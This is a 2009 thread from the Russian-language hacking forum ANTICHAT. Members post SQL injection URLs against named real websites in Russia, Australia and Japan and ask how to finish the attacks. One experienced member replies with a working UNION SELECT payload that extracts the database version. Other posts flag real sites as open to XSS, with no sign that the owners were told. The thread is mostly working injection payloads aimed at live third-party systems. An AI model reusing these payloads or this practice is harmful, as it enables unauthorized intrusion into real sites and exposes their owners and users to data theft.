ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
08.01.2009, 10:57
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
Код:
http://www.tk-expo.ru/news/?id=-8+GROUP+BY+9--
кол-во столбцов = 9
inj не получается..
кто сделает отпишите какой должен быть запрос для inj  |
|
|
08.01.2009, 11:59
|
|
Banned
Регистрация: 30.01.2008
Сообщений: 32
Провел на форуме:
143465
Репутация:
32
|
|
http://www.photosale.ru/find/search.php
XSS
|
|
|
|
08.01.2009, 12:07
|
|
Banned
Регистрация: 30.01.2008
Сообщений: 32
Провел на форуме:
143465
Репутация:
32
|
|
http://kadet.ru/index.php?page=guest
XSS
|
|
|
|
08.01.2009, 12:34
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
Сообщение от tsesar
http://www.photosale.ru/find/search.php
XSS
Сообщение от tsesar
http://kadet.ru/index.php?page=guest
XSS
И?
|
|
|
|
08.01.2009, 12:40
|
|
Banned
Регистрация: 30.01.2008
Сообщений: 32
Провел на форуме:
143465
Репутация:
32
|
|
просто так выложил)))))
|
|
|
|
08.01.2009, 15:37
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
Код:
http://www.oceanworld.com.au/page.asp?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
выводиться поле 2, при попытки вместо 2 написать version() или user() - ошибка
vesion(): mysqld-5.0.18-nt
Код:
http://www.oceanworld.com.au/page.asp?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables--
как сделать вывод??? |
|
|
|
08.01.2009, 15:39
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
http://www.oceanworld.com.au/page.asp?id=-8+union+select+1,unhex(hex(version())),3,4,5,6,7,8 ,9,10,11,12,13,14--
Одно и тоже на каждой странице темы=\
|
|
|
|
08.01.2009, 16:31
|
|
Новичок
Регистрация: 07.01.2009
Сообщений: 6
Провел на форуме:
8492
Репутация:
0
|
|
А можно ли счесть за уязвимость то что когда регишься на сайте тот логин который ты ввёл будет отоброжаться в ссылке так www.site.ru/users/твойлогин ?
Последний раз редактировалось FunkFan; 09.01.2009 в 01:03..
|
|
|
|
08.01.2009, 19:23
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
FunkFan, наврятли.
|
|
|
|
08.01.2009, 22:30
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
http://shop.m-matching.jp/chara/prd_detail.php?ID=10001060+or+1=1--
http://shop.m-matching.jp/chara/prd_detail.php?ID=10001060+order+by+1--
нету вывода? (
http://www.glassfactory.co.jp/shop/detail.php?id=-4+or+1=1--
и вот еще как составить правильный запрос к бд postgre?
Последний раз редактировалось sabe; 08.01.2009 в 22:33..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
